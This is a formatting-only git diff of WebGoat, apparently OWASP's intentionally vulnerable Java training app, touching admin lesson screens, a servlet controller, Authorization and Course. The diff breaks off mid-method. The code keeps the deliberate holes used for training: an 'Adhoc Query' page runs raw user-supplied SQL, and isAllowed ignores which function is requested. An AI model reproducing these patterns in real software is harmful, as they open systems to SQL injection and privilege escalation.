diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/UserAdminScreen.java b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/UserAdminScreen.java
index f5aadd51e..024f1a8c3 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/UserAdminScreen.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/UserAdminScreen.java
@@ -1,10 +1,10 @@
+
 package org.owasp.webgoat.lessons.admin;
 
 import java.sql.Connection;
 import java.sql.ResultSet;
 import java.sql.ResultSetMetaData;
 import java.sql.Statement;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.owasp.webgoat.lessons.Category;
@@ -12,117 +12,110 @@ import org.owasp.webgoat.lessons.LessonAdapter;
 import org.owasp.webgoat.session.DatabaseUtilities;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
+ * 
  * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
  * @created October 28, 2003
  */
 public class UserAdminScreen extends LessonAdapter
 {
 
-    private final static String QUERY = "SELECT * FROM user_system_data";
+	private final static String QUERY = "SELECT * FROM user_system_data";
 
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-
-	try
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
 	{
-		Connection connection = DatabaseUtilities.getConnection(s);
+		ElementContainer ec = new ElementContainer();
 
-	    Statement statement = connection.createStatement(
-		    ResultSet.TYPE_SCROLL_INSENSITIVE,
-		    ResultSet.CONCUR_READ_ONLY);
-	    ResultSet results = statement.executeQuery(QUERY);
+		try
+		{
+			Connection connection = DatabaseUtilities.getConnection(s);
 
-	    if (results != null)
-	    {
-		makeSuccess(s);
-		ResultSetMetaData resultsMetaData = results.getMetaData();
-		ec.addElement(DatabaseUtilities.writeTable(results,
-			resultsMetaData));
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	    e.printStackTrace();
+			Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+																ResultSet.CONCUR_READ_ONLY);
+			ResultSet results = statement.executeQuery(QUERY);
+
+			if (results != null)
+			{
+				makeSuccess(s);
+				ResultSetMetaData resultsMetaData = results.getMetaData();
+				ec.addElement(DatabaseUtilities.writeTable(results, resultsMetaData));
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
+		}
+
+		return (ec);
 	}
 
-	return (ec);
-    }
+	/**
+	 * Gets the category attribute of the UserAdminScreen object
+	 * 
+	 * @return The category value
+	 */
+	protected Category getDefaultCategory()
+	{
+		return Category.ADMIN_FUNCTIONS;
+	}
 
+	private final static Integer DEFAULT_RANKING = new Integer(1000);
 
-    /**
-     *  Gets the category attribute of the UserAdminScreen object
-     *
-     * @return    The category value
-     */
-    protected Category getDefaultCategory()
-    {
-	return Category.ADMIN_FUNCTIONS;
-    }
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
 
-    private final static Integer DEFAULT_RANKING = new Integer(1000);
+	/**
+	 * Gets the role attribute of the UserAdminScreen object
+	 * 
+	 * @return The role value
+	 */
+	public String getRole()
+	{
+		return HACKED_ADMIN_ROLE;
+	}
 
-
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
-
-
-    /**
-     *  Gets the role attribute of the UserAdminScreen object
-     *
-     * @return    The role value
-     */
-    public String getRole()
-    {
-	return HACKED_ADMIN_ROLE;
-    }
-
-
-    /**
-     *  Gets the title attribute of the UserAdminScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return ("User Information");
-    }
+	/**
+	 * Gets the title attribute of the UserAdminScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("User Information");
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/ViewDatabase.java b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/ViewDatabase.java
index 86d3e89db..feaa406d4 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/ViewDatabase.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/ViewDatabase.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons.admin;
 
 import java.sql.Connection;
@@ -13,160 +14,149 @@ import org.apache.ecs.StringElement;
 import org.apache.ecs.html.Input;
 import org.owasp.webgoat.session.*;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
- * @created    October 28, 2003
+ * 
+ * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created October 28, 2003
  */
 public class ViewDatabase extends LessonAdapter
 {
 
-    private final static String SQL = "sql";
+	private final static String SQL = "sql";
 
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-
-	try
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
 	{
-	    ec.addElement(new StringElement("Enter a SQL statement: "));
+		ElementContainer ec = new ElementContainer();
 
-	    StringBuffer sqlStatement = new StringBuffer(s.getParser()
-		    .getRawParameter(SQL, ""));
-	    Input input = new Input(Input.TEXT, SQL, sqlStatement.toString());
-	    ec.addElement(input);
-
-	    Element b = ECSFactory.makeButton("Go!");
-	    ec.addElement(b);
-
-		Connection connection = DatabaseUtilities.getConnection(s);
-
-	    if (sqlStatement.length() > 0)
-	    {
-
-		Statement statement = connection.createStatement(
-			ResultSet.TYPE_SCROLL_INSENSITIVE,
-			ResultSet.CONCUR_READ_ONLY);
-		ResultSet results = statement.executeQuery(sqlStatement
-			.toString());
-
-		if ((results != null) && (results.first() == true))
+		try
 		{
-		    makeSuccess(s);
-		    ResultSetMetaData resultsMetaData = results.getMetaData();
-		    ec.addElement(DatabaseUtilities.writeTable(results,
-			    resultsMetaData));
+			ec.addElement(new StringElement("Enter a SQL statement: "));
+
+			StringBuffer sqlStatement = new StringBuffer(s.getParser().getRawParameter(SQL, ""));
+			Input input = new Input(Input.TEXT, SQL, sqlStatement.toString());
+			ec.addElement(input);
+
+			Element b = ECSFactory.makeButton("Go!");
+			ec.addElement(b);
+
+			Connection connection = DatabaseUtilities.getConnection(s);
+
+			if (sqlStatement.length() > 0)
+			{
+
+				Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+																	ResultSet.CONCUR_READ_ONLY);
+				ResultSet results = statement.executeQuery(sqlStatement.toString());
+
+				if ((results != null) && (results.first() == true))
+				{
+					makeSuccess(s);
+					ResultSetMetaData resultsMetaData = results.getMetaData();
+					ec.addElement(DatabaseUtilities.writeTable(results, resultsMetaData));
+				}
+
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
 		}
 
-	    }
+		return (ec);
 	}
-	catch (Exception e)
+
+	/**
+	 * Gets the category attribute of the DatabaseScreen object
+	 * 
+	 * @return The category value
+	 */
+	protected Category getDefaultCategory()
 	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	    e.printStackTrace();
+		return Category.ADMIN_FUNCTIONS;
 	}
 
-	return (ec);
-    }
+	private final static Integer DEFAULT_RANKING = new Integer(1000);
 
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
 
-    /**
-     *  Gets the category attribute of the DatabaseScreen object
-     *
-     * @return    The category value
-     */
-    protected Category getDefaultCategory()
-    {
-	return Category.ADMIN_FUNCTIONS;
-    }
+	/**
+	 * Gets the hints attribute of the DatabaseScreen object
+	 * 
+	 * @return The hints value
+	 */
+	protected List<String> getHints(WebSession s)
+	{
+		List<String> hints = new ArrayList<String>();
+		hints.add("There are no hints defined");
 
-    private final static Integer DEFAULT_RANKING = new Integer(1000);
+		return hints;
+	}
 
+	/**
+	 * Gets the instructions attribute of the ViewDatabase object
+	 * 
+	 * @return The instructions value
+	 */
+	public String getInstructions(WebSession s)
+	{
+		String instructions = "Please post a message to to the WebGoat forum. Your messages will be available for everyone to read.";
 
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
+		return (instructions);
+	}
 
+	/**
+	 * Gets the role attribute of the ViewDatabase object
+	 * 
+	 * @return The role value
+	 */
+	public String getRole()
+	{
+		return HACKED_ADMIN_ROLE;
+	}
 
-    /**
-     *  Gets the hints attribute of the DatabaseScreen object
-     *
-     * @return    The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
-	hints.add("There are no hints defined");
-
-	return hints;
-    }
-
-
-    /**
-     *  Gets the instructions attribute of the ViewDatabase object
-     *
-     * @return    The instructions value
-     */
-    public String getInstructions(WebSession s)
-    {
-	String instructions = "Please post a message to to the WebGoat forum. Your messages will be available for everyone to read.";
-
-	return (instructions);
-    }
-
-
-    /**
-     *  Gets the role attribute of the ViewDatabase object
-     *
-     * @return    The role value
-     */
-    public String getRole()
-    {
-	return HACKED_ADMIN_ROLE;
-    }
-
-
-    /**
-     *  Gets the title attribute of the DatabaseScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return ("Adhoc Query");
-    }
+	/**
+	 * Gets the title attribute of the DatabaseScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("Adhoc Query");
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/WelcomeAdminScreen.java b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/WelcomeAdminScreen.java
index 5e4ae2c01..3501c0349 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/WelcomeAdminScreen.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/WelcomeAdminScreen.java
@@ -1,91 +1,89 @@
+
 package org.owasp.webgoat.lessons.admin;
 
 import org.owasp.webgoat.lessons.WelcomeScreen;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.html.Center;
 import org.apache.ecs.html.H1;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
- * @created    October 28, 2003
+ * 
+ * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created October 28, 2003
  */
 public class WelcomeAdminScreen extends WelcomeScreen
 {
 
-    /**
-     *  Constructor for the WelcomeAdminScreen object
-     *
-     * @param  s  Description of the Parameter
-     */
-    public WelcomeAdminScreen(WebSession s)
-    {
-	super(s);
-    }
+	/**
+	 * Constructor for the WelcomeAdminScreen object
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 */
+	public WelcomeAdminScreen(WebSession s)
+	{
+		super(s);
+	}
 
+	/**
+	 * Constructor for the WelcomeAdminScreen object
+	 */
+	public WelcomeAdminScreen()
+	{
+	}
 
-    /**
-     *  Constructor for the WelcomeAdminScreen object
-     */
-    public WelcomeAdminScreen()
-    {}
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
+	{
+		ElementContainer ec = new ElementContainer();
 
+		ec.addElement(new Center(new H1("You are logged on as an administrator")));
+		ec.addElement(super.createContent(s));
 
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
+		return (ec);
+	}
 
-	ec.addElement(new Center(
-		new H1("You are logged on as an administrator")));
-	ec.addElement(super.createContent(s));
-
-	return (ec);
-    }
-
-
-    /**
-     *  Gets the title attribute of the WelcomeAdminScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return ("Admin Welcome");
-    }
+	/**
+	 * Gets the title attribute of the WelcomeAdminScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("Admin Welcome");
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/servlets/Controller.java b/main/project/JavaSource/org/owasp/webgoat/servlets/Controller.java
index a28537df3..59147040b 100644
--- a/main/project/JavaSource/org/owasp/webgoat/servlets/Controller.java
+++ b/main/project/JavaSource/org/owasp/webgoat/servlets/Controller.java
@@ -1 +1 @@
-package org.owasp.webgoat.servlets;

import java.io.IOException;

import javax.servlet.ServletException;

import javax.servlet.http.HttpServlet;

import javax.servlet.http.HttpServletRequest;

import javax.servlet.http.HttpServletResponse;

/*******************************************************************************
 * 
 * 
 * This file is part of WebGoat, an Open Web Application Security Project
 * utility. For details, please see http://www.owasp.org/
 * 
 * Copyright (c) 2002 - 2007 Bruce Mayhew
 * 
 * This program is free software; you can redistribute it and/or modify it under
 * the terms of the GNU General Public License as published by the Free Software
 * Foundation; either version 2 of the License, or (at your option) any later
 * version.
 * 
 * This program is distributed in the hope that it will be useful, but WITHOUT
 * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
 * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
 * details.
 * 
 * You should have received a copy of the GNU General Public License along with
 * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
 * Place - Suite 330, Boston, MA 02111-1307, USA.
 * 
 * Getting Source ==============
 * 
 * Source for this application is maintained at code.google.com, a repository
 * for free software projects.
 * 
 * For details, please see http://code.google.com/p/webgoat/
 */

public class Controller extends HttpServlet

{

    private static final long serialVersionUID = 1L;


    protected void doGet(HttpServletRequest request,
	    HttpServletResponse response) throws ServletException, IOException

    {

	doPost(request, response);

    }


    protected void doPost(HttpServletRequest request,
	    HttpServletResponse response) throws ServletException, IOException

    {

	String userAgent = request.getHeader("user-agent");

	String clientBrowser = "Not known!";

	if (userAgent != null)

	{

	    clientBrowser = userAgent;

	}

	request.setAttribute("client.browser", clientBrowser);

	request.getRequestDispatcher("/view.jsp").forward(request, response);

    }

}
\ No newline at end of file
+
package org.owasp.webgoat.servlets;

import java.io.IOException;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;


/***************************************************************************************************
 * 
 * 
 * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
 * please see http://www.owasp.org/
 * 
 * Copyright (c) 2002 - 2007 Bruce Mayhew
 * 
 * This program is free software; you can redistribute it and/or modify it under the terms of the
 * GNU General Public License as published by the Free Software Foundation; either version 2 of the
 * License, or (at your option) any later version.
 * 
 * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
 * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * General Public License for more details.
 * 
 * You should have received a copy of the GNU General Public License along with this program; if
 * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
 * 02111-1307, USA.
 * 
 * Getting Source ==============
 * 
 * Source for this application is maintained at code.google.com, a repository for free software
 * projects.
 * 
 * For details, please see http://code.google.com/p/webgoat/
 */

public class Controller extends HttpServlet

{

	private static final long serialVersionUID = 1L;

	protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException

	{

		doPost(request, response);

	}

	protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException,
			IOException

	{

		String userAgent = request.getHeader("user-agent");

		String clientBrowser = "Not known!";

		if (userAgent != null)

		{

			clientBrowser = userAgent;

		}

		request.setAttribute("client.browser", clientBrowser);

		request.getRequestDispatcher("/view.jsp").forward(request, response);

	}

}
\ No newline at end of file
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/Authorization.java b/main/project/JavaSource/org/owasp/webgoat/session/Authorization.java
index e01428c25..49423ff2a 100644
--- a/main/project/JavaSource/org/owasp/webgoat/session/Authorization.java
+++ b/main/project/JavaSource/org/owasp/webgoat/session/Authorization.java
@@ -1,55 +1,53 @@
+
 package org.owasp.webgoat.session;
 
 import java.util.Hashtable;
 import java.util.Map;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
 public class Authorization
 {
 
-    Map<Integer, Integer> permissions = new Hashtable<Integer, Integer>();
+	Map<Integer, Integer> permissions = new Hashtable<Integer, Integer>();
 
+	public Authorization()
+	{
+	}
 
-    public Authorization()
-    {}
+	public void setPermission(int userId, int functionId)
+	{
+		permissions.put(new Integer(userId), new Integer(functionId));
+	}
 
-
-    public void setPermission(int userId, int functionId)
-    {
-	permissions.put(new Integer(userId), new Integer(functionId));
-    }
-
-
-    public boolean isAllowed(int userId, int functionId)
-    {
-	return (permissions.get(new Integer(userId)) != null);
-    }
+	public boolean isAllowed(int userId, int functionId)
+	{
+		return (permissions.get(new Integer(userId)) != null);
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/Course.java b/main/project/JavaSource/org/owasp/webgoat/session/Course.java
index efbc9dc33..31580f223 100644
--- a/main/project/JavaSource/org/owasp/webgoat/session/Course.java
+++ b/main/project/JavaSource/org/owasp/webgoat/session/Course.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.session;
 
 import java.io.File;
@@ -9,435 +10,425 @@ import java.util.List;
 import java.util.Set;
 import java.util.Vector;
 import java.util.LinkedList;
-
 import javax.servlet.ServletContext;
-
 import org.owasp.webgoat.HammerHead;
 import org.owasp.webgoat.lessons.AbstractLesson;
 import org.owasp.webgoat.lessons.Category;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
- * @created    October 28, 2003
+ * 
+ * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created October 28, 2003
  */
 public class Course
 {
 
-    private List<AbstractLesson> lessons = new LinkedList<AbstractLesson>();
+	private List<AbstractLesson> lessons = new LinkedList<AbstractLesson>();
 
-    private final static String PROPERTIES_FILENAME = HammerHead.propertiesPath;
+	private final static String PROPERTIES_FILENAME = HammerHead.propertiesPath;
 
-    private WebgoatProperties properties = null;
-    
-    private List<String> files = new LinkedList<String>();
+	private WebgoatProperties properties = null;
 
-    private WebgoatContext webgoatContext;
+	private List<String> files = new LinkedList<String>();
 
-    public Course()
-    {
+	private WebgoatContext webgoatContext;
+
+	public Course()
+	{
 		try
 		{
-		    properties = new WebgoatProperties(PROPERTIES_FILENAME);
-		}
-		catch (IOException e)
+			properties = new WebgoatProperties(PROPERTIES_FILENAME);
+		} catch (IOException e)
 		{
-		    System.out.println("Error loading WebGoat properties");
-		    e.printStackTrace();
+			System.out.println("Error loading WebGoat properties");
+			e.printStackTrace();
 		}
-    }
-    
-    /**
-     * Take an absolute file and return the filename.
-     * 
-     * Ex. /etc/password becomes password
-     * 
-     * @param s
-     * @return the file name
-     */
-    private static String getFileName(String s)
-    {
-    	String fileName = new File(s).getName();
-		
-		if(fileName.indexOf("/") != -1)
+	}
+
+	/**
+	 * Take an absolute file and return the filename.
+	 * 
+	 * Ex. /etc/password becomes password
+	 * 
+	 * @param s
+	 * @return the file name
+	 */
+	private static String getFileName(String s)
+	{
+		String fileName = new File(s).getName();
+
+		if (fileName.indexOf("/") != -1)
 		{
 			fileName = fileName.substring(fileName.lastIndexOf("/"), fileName.length());
 		}
-		
-		if(fileName.indexOf(".") != -1)
+
+		if (fileName.indexOf(".") != -1)
 		{
 			fileName = fileName.substring(0, fileName.indexOf("."));
 		}
-		
+
 		return fileName;
-    }
-    
-    /**
-     * Take a class name and return the equivalent file name
-     * 
-     * Ex. org.owasp.webgoat becomes org/owasp/webgoat.java
-     * 
-     * @param className
-     * @return
-     */
-    private static String getSourceFile(String className)
-    {
-    	StringBuffer sb = new StringBuffer();
-    	
-    	sb.append(className.replace(".", "/"));
-    	sb.append(".java");
-    	
-    	return sb.toString();
-    }
+	}
 
+	/**
+	 * Take a class name and return the equivalent file name
+	 * 
+	 * Ex. org.owasp.webgoat becomes org/owasp/webgoat.java
+	 * 
+	 * @param className
+	 * @return
+	 */
+	private static String getSourceFile(String className)
+	{
+		StringBuffer sb = new StringBuffer();
 
-    /**
-     *  Takes a file name and builds the class file name
-     *
-     * @param  fileName  Description of the Parameter
-     * @param  path      Description of the Parameter
-     * @return           Description of the Return Value
-     */
-    private static String getClassFile(String fileName, String path)
-    {
-    	String ext = ".class";
+		sb.append(className.replace(".", "/"));
+		sb.append(".java");
+
+		return sb.toString();
+	}
+
+	/**
+	 * Takes a file name and builds the class file name
+	 * 
+	 * @param fileName
+	 *            Description of the Parameter
+	 * @param path
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	private static String getClassFile(String fileName, String path)
+	{
+		String ext = ".class";
 		fileName = fileName.trim();
-		
+
 		/**
-		 * We do not handle directories.
-		 * We do not handle files with different extensions
+		 * We do not handle directories. We do not handle files with different extensions
 		 */
-		if(fileName.endsWith("/") || !fileName.endsWith(ext))
-		{
-			return null;
-		}
-	
+		if (fileName.endsWith("/") || !fileName.endsWith(ext)) { return null; }
+
 		// if the file is in /WEB-INF/classes strip the dir info off
 		int index = fileName.indexOf("/WEB-INF/classes/");
 		if (index != -1)
 		{
-		    fileName = fileName.substring(index + "/WEB-INF/classes/".length(), fileName.length() - ext.length());
-		    fileName = fileName.replace('/', '.');
-		    fileName = fileName.replace('\\', '.');
+			fileName = fileName.substring(index + "/WEB-INF/classes/".length(), fileName.length() - ext.length());
+			fileName = fileName.replace('/', '.');
+			fileName = fileName.replace('\\', '.');
 		}
 		else
 		{
-		    // Strip off the leading path info
-		    fileName = fileName.substring(path.length(), fileName.length() - ext.length());
